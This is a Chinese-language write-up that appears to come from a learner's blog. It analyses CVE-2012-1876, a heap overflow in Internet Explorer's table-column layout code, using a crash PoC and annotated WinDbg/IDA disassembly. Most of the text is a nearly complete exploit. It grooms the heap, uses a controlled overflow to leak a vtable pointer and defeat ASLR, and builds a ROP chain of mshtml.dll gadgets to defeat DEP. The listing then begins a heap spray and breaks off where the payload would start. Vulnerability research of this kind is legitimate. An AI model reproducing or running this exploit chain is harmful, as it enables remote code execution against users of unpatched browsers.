  • CVE_2012_1876堆溢出分析

      首先用 WinDbg 附加到 IE 的内容(标签页)进程,用 `!gflag +hpa` 为该进程开启页堆(Page Heap):每个堆块之后紧跟一页不可访问的内存,越界写会在写入的那条指令上立刻触发访问违例,而不是悄悄破坏相邻堆块,这也是下面崩溃点能直接停在溢出写指令上的原因;再用 `.childdbg 1` 允许调试子进程,然后加载 POC。

    POC:

    <html>
     <body>
     <!-- Fixed-layout table with a single <col>. Its width/span are the two
          attributes the script changes later; the stray "&nbsp " (no ';') is
          kept exactly as in the original PoC. -->
     <table style="table-layout:fixed" >
            <col id="132" width="41" span="1" >&nbsp </col>
     </table>
     <script>
     
     // Runs after the table has been laid out once with span="1".
     // Per the CalculateMinMax/AdjustForCol analysis further down this page,
     // the column array is sized from the span count seen at allocation time
     // while the per-column copy uses the new span, so raising span to 1000
     // makes the copy run past the end of the heap buffer (the crash seen
     // under !gflag +hpa).  width is set first because the copied value is
     // derived from it (width*100 in the disassembly annotations).
     function over_trigger() {
            var obj_col = document.getElementById("132");
            obj_col.width = "42765";
            obj_col.span = 1000;
     }
     
     // 1 ms delay: presumably just so the initial layout has completed
     // before the attributes are changed.
     setTimeout("over_trigger();",1);
     </script>
     </body>
     </html>

      附加后断在这个位置:崩溃指令是一条向 [EDI] 写入的指令,而 EDI 指向的内存不可写(开启 hpa 之后,这很可能就是某个堆块末尾的保护页,即一次越界写)。下面分析 EDI 的值是怎么来的、为什么会越过堆块边界。

      在这个位置栈回溯

      首先从mshtml!CTableColCalc::AdjustForCol开始分析,uf mshtml!CTableColCalc::AdjustForCol

    1:022> uf mshtml!CTableColCalc::AdjustForCol
    mshtml!CTableColCalc::AdjustForCol:
    67ebf152 8bff            mov     edi,edi
    67ebf154 55              push    ebp
    67ebf155 8bec            mov     ebp,esp
    67ebf157 8b08            mov     ecx,dword ptr [eax]
    67ebf159 53              push    ebx
    67ebf15a 8b5d08          mov     ebx,dword ptr [ebp+8]
    67ebf15d 57              push    edi
    67ebf15e 8bc1            mov     eax,ecx
    67ebf160 83e00f          and     eax,0Fh
    67ebf163 8d7e18          lea     edi,[esi+18h]        //这里对edi赋值了
    …以下无用代码省略

      反汇编可以看到 mshtml!CTableColCalc::AdjustForCol 这个函数只有 67ebf163 这一处对 edi 赋值(edi = esi + 0x18),而该函数在此之前并没有对 esi 赋值,说明 esi 是调用者传进来的(见下文 CalculateMinMax 里 call 之前的 `mov esi, [ebp+var_24]`),所以继续反汇编上层函数 mshtml!CTableLayout::CalculateMinMax

      这里我们在IDA里加载符号表分析一下CTableLayout::CalculateMinMax这个函数

    .text:74D3018A                 mov     edi, edi    //巨硬为了INLINE HOOK时方便函数前五字节覆盖做的优化
    .text:74D3018C                 push    ebp
    .text:74D3018D                 mov     ebp, esp
    .text:74D3018F                 sub     esp, 90h    //开辟栈帧
    .text:74D30195                 push    ebx        //栈回溯上层函数,tagSIZE *
    .text:74D30196                 mov     ebx, [ebp+arg_0]        //ebx=参数1=CTableLayout
    .text:74D30199                 push    esi            //栈回溯上层函数,CTableCalcInfo *
    .text:74D3019A                 mov     esi, [ebp+arg_4]        //esi=参数2
    .text:74D3019D                 mov     eax, [esi+28h]
    .text:74D301A0                 mov     [ebp+var_8C], eax
    .text:74D301A6                 mov     eax, [ebx+54h]        //eax=span属性的和
    .text:74D301A9                 mov     [ebp+arg_0], eax
    …省略无用代码
    .text:74D30293 loc_74D30293:                           ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+105↑j
    .text:74D30293                 mov     edx, [ebp+arg_0]        //edx=span属性的和
    .text:74D30296                 mov     eax, edx
    .text:74D30298                 sub     eax, ecx
    .text:74D3029A                 mov     [ebp+var_1C], eax
    .text:74D3029D                 push    0
    .text:74D3029F                 pop     eax
    .text:74D302A0                 setz    al
    .text:74D302A3                 mov     [ebx+50h], ecx
    .text:74D302A6                 shl     eax, 8
    .text:74D302A9                 xor     eax, [ebx+44h]
    .text:74D302AC                 and     eax, 100h
    .text:74D302B1                 xor     [ebx+44h], eax
    .text:74D302B4                 test    byte ptr [esi+2Ch], 1
    .text:74D302B8                 jnz     loc_74C5EE4D
    .text:74D302BE
    .text:74D302BE loc_74D302BE:                           ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)-D133B↑j
    .text:74D302BE                 xor     eax, eax
    .text:74D302C0
    .text:74D302C0 loc_74D302C0:                           ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+1957B9↓j
    .text:74D302C0                 or      [ebp+var_38], eax
    .text:74D302C3                 cmp     [ebp+nDenominator], edi
    .text:74D302C6                 jnz     loc_74EC5948
    .text:74D302CC                 mov     eax, [ebx+94h]    //eax=CTableLayout+94H,记为spancmp
    .text:74D302D2                 shr     eax, 2            //eax>>2
    .text:74D302D5                 cmp     eax, edx        //edx=span属性的和,记为spansum
    .text:74D302D7                 jge     short loc_74D30312
    .text:74D302D9                 cmp     edx, edi
    .text:74D302DB                 lea     esi, [ebx+90h]
    .text:74D302E1                 jl      loc_74C2CE82
    .text:74D302E7                 cmp     edx, [esi+8]
    .text:74D302EA                 jbe     short loc_74D302FF
    .text:74D302EC                 push    1Ch             ; Size
    .text:74D302EE                 mov     eax, edx
    .text:74D302F0                 mov     edi, esi
    .text:74D302F2        call    ?EnsureSizeWorker@CImplAry@@AAEJIJ@Z ; CImplAry::EnsureSizeWorker(uint,long)                        //eax(=edx=spansum)为请求的元素个数,前面 push 的 1Ch 为元素大小,edi=esi 指向 CTableLayout+0x90(应为 CImplAry 数组对象);跟进这个函数发现在这里开辟堆空间
    
    .text:74DF8FB7                 mov     edi, edi
    .text:74DF8FB9                 push    ebp
    .text:74DF8FBA                 mov     ebp, esp
    .text:74DF8FBC                 push    ecx
    .text:74DF8FBD                 push    ecx
    .text:74DF8FBE                 push    ebx
    .text:74DF8FBF                 push    esi
    .text:74DF8FC0                 mov     esi, eax
    .text:74DF8FC2                 push    4
    .text:74DF8FC4                 pop     eax
    .text:74DF8FC5                 mov     [ebp+var_4], eax
    .text:74DF8FC8                 cmp     esi, eax
    .text:74DF8FCA                 jnb     loc_74E02CB4
    .text:74DF8FD0
    .text:74DF8FD0 loc_74DF8FD0:                           ; CODE XREF: CImplAry::EnsureSizeWorker(uint,long)+9D00↓j
    .text:74DF8FD0                                         ; CImplAry::EnsureSizeWorker(uint,long)+9D25↓j ...
    .text:74DF8FD0                 mov     eax, [ebp+var_4]        //eax=4
    .text:74DF8FD3                 mul     [ebp+Size]            //字节数 = 元素个数(var_4,此处为最小值 4;esi>=4 时走未展示的 loc_74E02CB4 分支)× 元素大小 Size(0x1C);随后 ULongLongToUInt 对 64 位乘积做了截断检查,所以分配大小本身没有整数溢出,问题更可能在于分配时的元素个数与后续写入下标不一致
    .text:74DF8FD6                 push    edx
    .text:74DF8FD7                 push    eax
    .text:74DF8FD8                 lea     eax, [ebp+dwBytes]
    .text:74DF8FDB                 call    ?ULongLongToUInt@@YGJ_KPAI@Z ; ULongLongToUInt(unsigned __int64,uint *)
    .text:74DF8FE0                 mov     ebx, eax
    .text:74DF8FE2                 test    ebx, ebx
    .text:74DF8FE4                 jnz     short loc_74DF900B
    .text:74DF8FE6                 test    byte ptr [edi+4], 2
    .text:74DF8FEA                 jnz     loc_74E3BEEC
    .text:74DF8FF0                 push    [ebp+dwBytes]   ; dwBytes
    .text:74DF8FF3                 lea     esi, [edi+0Ch]        //esi=&(CTableLayout+0x90+0xC):存放数组缓冲区指针的槽位,_HeapRealloc(void**,uint)通过它写回新缓冲区地址;该缓冲区下文记为vulheap
    .text:74DF8FF6                 call    ?_HeapRealloc@@YGJPAPAXI@Z ; _HeapRealloc(void * *,uint)
    
    上面代码段的逻辑是:当 (spancmp>>2) < spansum 时,以 spansum 为元素个数、0x1C 为元素大小调用 EnsureSizeWorker 重新分配列数组(否则跳过这次分配),新缓冲区地址保存在 CTableLayout+0x90+0xC(即下文读取的 [ebx+9Ch],记为 vulheap)。需要注意:分配大小只取决于此处的 spansum,而后面 AdjustForCol 的写入地址 vulheap+span*0x1C 取决于 nDenominator(脚本改大后的 span=1000),两者一旦不一致,写入就会落在 vulheap 之外。
    
    .text:74EC5AB0                 push    0
    .text:74EC5AB2                 push    esi
    .text:74EC5AB3                 call    ?GetPixelWidth@CWidthUnitValue@@QBEHPBVCDocInfo@@PAVCElement@@H@Z ; CWidthUnitValue::GetPixelWidth(CDocInfo const *,CElement *,int)
    .text:74EC5AB8                 cmp     [ebp+var_5C], 0
    .text:74EC5ABC                 mov     [ebp+var_2C], eax    //copydata=width*100
    …省略无用代码
    .text:74EC5B3E                 mov     eax, [ebp+nDenominator]        //span=1000
    .text:74EC5B41                 imul    ecx, 1Ch    
    .text:74EC5B44                 add     [ebp+var_38], eax
    .text:74EC5B47                 mov     [ebp+var_20], ecx
    .text:74EC5B4A                 jmp     short loc_74EC5B4F
    .text:74EC5B4C ; ---------------------------------------------------------------------------
    .text:74EC5B4C
    .text:74EC5B4C loc_74EC5B4C:                           ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+195A11↓j
    .text:74EC5B4C                 mov     ecx, [ebp+var_20]
    .text:74EC5B4F
    .text:74EC5B4F loc_74EC5B4F:                           ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+1959C0↑j
    .text:74EC5B4F                 mov     eax, [ebx+9Ch]        //eax=vulheap
    .text:74EC5B55                 add     eax, ecx        //eax=vulheap+span*0x1c
    .text:74EC5B57                 cmp     [ebp+var_1C], 0
    .text:74EC5B5B                 mov     [ebp+var_24], eax
    .text:74EC5B5E                 jz      short loc_74EC5B7A
    .text:74EC5B60                 mov     eax, [ebp+nDenominator]
    .text:74EC5B63                 cmp     eax, 1
    .text:74EC5B66                 jle     short loc_74EC5B7A
    .text:74EC5B68                 dec     eax
    .text:74EC5B69                 cmp     [ebp+var_14], eax
    .text:74EC5B6C                 jnz     short loc_74EC5B7A
    .text:74EC5B6E                 imul    eax, [ebp+var_C]
    .text:74EC5B72                 mov     ecx, [ebp+var_2C]    //ecx=copydata
    .text:74EC5B75                 sub     ecx, eax
    .text:74EC5B77                 mov     [ebp+var_C], ecx        //[ebp-c]=span*0x1c
    .text:74EC5B7A
    .text:74EC5B7A loc_74EC5B7A:                           ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+1959D4↑j
    .text:74EC5B7A                                         ; CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+1959DC↑j ...
    .text:74EC5B7A                 push    [ebp+var_3C]
    .text:74EC5B7D                 mov     eax, [ebp+var_34]
    .text:74EC5B80                 push    [ebp+arg_4]
    .text:74EC5B83                 mov     esi, [ebp+var_24]    
    .text:74EC5B86                 push    [ebp+var_C]            //copydata
    .text:74EC5B89                 call    ?AdjustForCol@CTableColCalc@@QAEXPBVCWidthUnitValue@@HPAVCCalcInfo@@H@Z ; CTableColCalc::AdjustForCol(CWidthUnitValue const *,int,CCalcInfo *,int)

      这里我们继续查看一下AdjustForCol这个函数

      AdjustForCol 以 (EAX & 0xF) 的结果作为循环次数(对应上面的 `and eax,0Fh`),依次把 CWidthUnitValue *a4 的内容复制到 esi 指向的元素(esi = vulheap + span*0x1C,由调用者传入)。当 span 超过分配时的元素个数,目标地址就落在 vulheap 之外,于是造成堆溢出。

     

    这几天心态有点崩,VUPEN的EXP详细分析先放着吧,需要绕过ASLR和DEP。大致思路是先利用这次堆溢出造成一次信息泄露:溢出把相邻 BSTR 的长度前缀改大,脚本通过 arr[i].length 变长发现它,再用 substring 越过原字符串末尾读出后面 CButtonLayout 对象开头的虚表指针;这个虚表指针相对 mshtml.dll 基址的偏移是固定值(下面脚本里的 0x1582b8,只对特定版本的 mshtml.dll 成立),由此算出模块基址,绕过ASLR(至于CButtonLayout本身处于堆空间,也受ASLR影响,我们能读到这个指针值的原因是CButtonLayout位于vulheap的固定偏移处,这个偏移量是0X300+8*3+4,即3个0X100的堆块+3个块首大小+4字节虚表指针)。DEP的绕过是用算出的基址构造一条ROP链:注意下面 rop_chain 中注释的是 VirtualAlloc 的 IAT 指针,按 mona 标准链的约定 ebx=1、edx=0x1000、ecx=0x40 分别对应 dwSize/MEM_COMMIT/PAGE_EXECUTE_READWRITE,所以实际调用的应是 VirtualAlloc 而不是 VirtualProtect。然后通过堆喷射把ROP链和SHELLCODE喷射到可预测地址,最后再触发一次溢出把虚表指针覆写为喷射区内的地址(smash_vtable 中 width*100 = 0x07070024)。

    关于里边详细的原理等变强了有时间再补吧。。

    深深的感慨漏洞利用的艺术,学无止境,现在真的还太菜

            <html>
            <body>
            <div id="test"></div>
            <script language='javascript'>
                    
            // Index of the arr[] string found to be overflowed (set by over_trigger()).
            var leak_index = -1;
    
            // Three filler patterns, doubled until at least 480 UTF-16 units (ends at 512).
            var dap = "EEEE";
            while ( dap.length < 480 ) dap += dap;
    
            var padding = "AAAA";
            while ( padding.length < 480 ) padding += padding;
    
            var filler = "BBBB";
            while ( filler.length < 480 ) filler += filler;
    
            // Heap grooming ("spray" in the original): alternate BSTRs and <button>
            // elements so that, per the prose above, the vulnerable column array,
            // the "A"/"B" strings and a CButtonLayout end up adjacent in 0x100-byte
            // chunks. (0x100-6)/2 = 125 UTF-16 units; the "-6" presumably accounts
            // for the 4-byte BSTR length prefix plus the 2-byte terminator so that
            // each string occupies exactly a 0x100-byte allocation - TODO confirm.
            var arr = new Array();
            var rra = new Array();
    
            // Buttons go into a hidden div so nothing is rendered.
            var div_container = document.getElementById("test");
            div_container.style.cssText = "display:none";
    
            for (var i=0; i < 500; i+=2) {
    
                // E: string that is freed below to leave a 0x100-byte hole
                rra[i] = dap.substring(0, (0x100-6)/2);
    
                // S, bstr = A: string whose length prefix the overflow is expected to corrupt
                arr[i] = padding.substring(0, (0x100-6)/2);
    
                // A, bstr = B
                arr[i+1] = filler.substring(0, (0x100-6)/2);
    
                // B: a <button>; its layout object supplies the vtable pointer that is leaked
                var obj = document.createElement("button");
                div_container.appendChild(obj);
    
            }
    
            // Free the "E" strings from index 200 on and collect immediately after each,
            // presumably punching 0x100-byte holes for the column array that gets
            // (re)allocated when col #132's span is changed in the next script.
            for (var i=200; i<500; i+=2 ) {
                rra[i] = null;
                CollectGarbage();
            }
    
            </script>
            <table style="table-layout:fixed" ><col id="0" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="1" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="2" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="3" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="4" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="5" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="6" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="7" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="8" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="9" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="10" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="11" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="12" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="13" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="14" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="15" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="16" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="17" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="18" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="19" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="20" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="21" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col 
id="22" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="23" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="24" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="25" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="26" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="27" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="28" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="29" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="30" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="31" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="32" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="33" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="34" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="35" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="36" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="37" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="38" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="39" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="40" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="41" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="42" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="43" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="44" width="41" span="9" >&nbsp 
</col></table><table style="table-layout:fixed" ><col id="45" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="46" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="47" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="48" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="49" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="50" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="51" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="52" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="53" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="54" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="55" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="56" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="57" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="58" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="59" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="60" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="61" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="62" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="63" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="64" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="65" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="66" width="41" span="9" >&nbsp </col></table><table 
style="table-layout:fixed" ><col id="67" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="68" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="69" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="70" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="71" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="72" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="73" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="74" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="75" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="76" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="77" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="78" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="79" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="80" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="81" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="82" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="83" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="84" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="85" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="86" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="87" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="88" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="89" 
width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="90" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="91" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="92" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="93" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="94" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="95" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="96" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="97" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="98" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="99" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="100" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="101" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="102" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="103" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="104" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="105" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="106" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="107" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="108" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="109" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="110" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="111" width="41" span="9" >&nbsp 
</col></table><table style="table-layout:fixed" ><col id="112" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="113" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="114" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="115" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="116" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="117" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="118" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="119" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="120" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="121" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="122" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="123" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="124" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="125" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="126" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="127" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="128" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="129" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="130" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="131" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="132" width="41" span="9" >&nbsp </col></table>
            
            <script language='javascript'>
                // First (controlled) overflow: the 133 tables above were laid out with
                // span="9"; bumping col #132 to 19 makes the layout code write more
                // 0x1C-byte column entries than its array was sized for (see the
                // CalculateMinMax/AdjustForCol analysis above). The value copied is
                // width*100 = 4100 = 0x1004, which presumably lands on the length
                // prefix of an adjacent 0x100-byte BSTR from the grooming loop -
                // that enlarged length is what over_trigger() looks for.
                var obj_col = document.getElementById("132");
                obj_col.span = 19;
        
            // Stage 1: find the BSTR whose length prefix was enlarged by the overflow
            // triggered by `obj_col.span = 19` above, and read the neighbouring
            // object's vtable pointer through it to derive the mshtml.dll base.
            function over_trigger() {
                var leak_addr = -1;
                for ( var i = 0; i < 500; i++ ) {
                    // Every arr[] string was created with exactly (0x100-6)/2 = 125
                    // UTF-16 units; a larger .length means its BSTR length prefix was
                    // overwritten by the out-of-bounds column writes.
                    if ( arr[i].length > (0x100-6)/2 ) { // overflowed
                        leak_index = i;
                        // Read 2 UTF-16 units (one dword) past the original string end:
                        // skip the 2-byte terminator and what the offsets treat as an
                        // 8-byte heap block header, then take 4 bytes - per the prose
                        // above, the vtable pointer at the start of a CButtonLayout.
                        var leak = arr[i].substring((0x100-6)/2+(2+8)/2, (0x100-6)/2+(2+8+4)/2);
                        // Reassemble little-endian: charCodeAt(1) is the high word.
                        // NOTE(review): toString(16) is not zero-padded, so a word below
                        // 0x1000 would give fewer than 4 hex digits and a wrong result.
                        // It works here because the low word is fixed by the 0x1582b8
                        // offset (0x82b8, assuming a 64 KiB-aligned DLL base) and the
                        // high word of a 32-bit DLL base has 4 hex digits - confirm.
                        leak_addr = parseInt( leak.charCodeAt(1).toString(16) + leak.charCodeAt(0).toString(16), 16 );
                        // 0x001582b8: RVA of the leaked vtable in the targeted mshtml.dll
                        // build (build-specific; the version is not recorded on this page).
                        mshtmlbase = leak_addr - Number(0x001582b8);
                        alert(mshtmlbase);
                        break;
                    }
                }
                // Failure only alerts; heap_spray()/smash_vtable() still run with mshtmlbase == "".
                if ( leak_addr == -1 || leak_index == -1 ) { alert("memory leak failed...."); }
            //return mshtmlbase;
            }
    
        // A very special heap spray
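        // Stage 2: build ROP chain + payload from the leaked mshtml.dll base and
        // spray ~400 MiB of copies so that the address later written over the
        // vtable pointer (0x07070024, see smash_vtable) lands inside a copy.
        //
        // Fixes relative to the original listing: the %u-escaped payload literal
        // was broken across two lines (a SyntaxError), the loop index `i` leaked
        // as an implicit global, and the local string `rop_chain` shadowed the
        // rop_chain() function of the same name.  Behaviour is otherwise unchanged.
        function heap_spray(){
            // Collect first so the spray strings are allocated into a cleaner heap.
            CollectGarbage();
            var heapobj = new Object();

            // ROP chain generated with mona.py for one specific mshtml.dll build
            // (the original note left the version blank; every offset below is only
            // valid for the same build the 0x1582b8 leak offset came from).  Per the
            // inline annotations this is the standard mona VirtualAlloc chain:
            // ebx=dwSize(1), edx=flAllocationType(0x1000), ecx=flProtect(0x40),
            // esi=&VirtualAlloc, ebp=jmp esp, edi=retn, then pushad turns the
            // register set into the call frame.  (The prose on this page calls it a
            // VirtualProtect chain; the chain itself says VirtualAlloc.)
            function rop_chain(mshtmlbase){
                var gadgets = [
                    mshtmlbase + Number(0x00001031),    // first gadget (unannotated in the original)
                    mshtmlbase + Number(0x00002c78),    // pop ebp; retn
                    mshtmlbase + Number(0x0001b4e3),    // xchg eax,esp; retn (pivot)
                    mshtmlbase + Number(0x00352c8b),    // pop eax; retn
                    mshtmlbase + Number(0x00001340),    // ptr to &VirtualAlloc() [IAT]
                    mshtmlbase + Number(0x00124ade),    // mov eax,[eax]; retn
                    mshtmlbase + Number(0x000af93e),    // xchg eax,esi; and al,0; xor eax,eax; retn
                    mshtmlbase + Number(0x00455a9c),    // pop ebp; retn
                    mshtmlbase + Number(0x00128b8d),    // & jmp esp
                    mshtmlbase + Number(0x00061436),    // pop ebx; retn
                    0x00000001,                         // 0x00000001-> ebx
                    mshtmlbase + Number(0x0052d8a3),    // pop edx; retn
                    0x00001000,                         // 0x00001000-> edx
                    mshtmlbase + Number(0x00003670),    // pop ecx; retn
                    0x00000040,                         // 0x00000040-> ecx
                    mshtmlbase + Number(0x001d263d),    // pop edi; retn
                    mshtmlbase + Number(0x000032ac),    // retn
                    mshtmlbase + Number(0x00352c9f),    // pop eax; retn
                    0x90909090,                         // nop
                    mshtmlbase + Number(0x0052e805),    // pushad; retn
                    0x90909090,
                    0x90909090,
                    0x90909090,
                    0x90909090,
                    0x90909090,
                ];
                return gadgets;
            }

            // Encode one 32-bit value as two UTF-16 code units, low half first
            // (little-endian once the string sits in memory).  `dword>>16` is a
            // signed shift, but String.fromCharCode applies ToUint16, so values at
            // or above 0x80000000 still encode correctly.
            function d2u(dword){
                var uni = String.fromCharCode(dword & 0xFFFF);
                uni += String.fromCharCode(dword>>16);
                return uni;
            }

            // Concatenate the d2u encoding of every dword in `tab`.
            function tab2uni(heapobj, tab){
                var uni = "";
                for(var i=0;i<tab.length;i++){
                    uni += heapobj.d2u(tab[i]);
                }
                return uni;
            }

            heapobj.tab2uni = tab2uni;
            heapobj.d2u = d2u;
            heapobj.rop_chain = rop_chain;

            // Opaque %u-escaped payload from the original exploit, reproduced
            // byte-for-byte and not analysed on this page.
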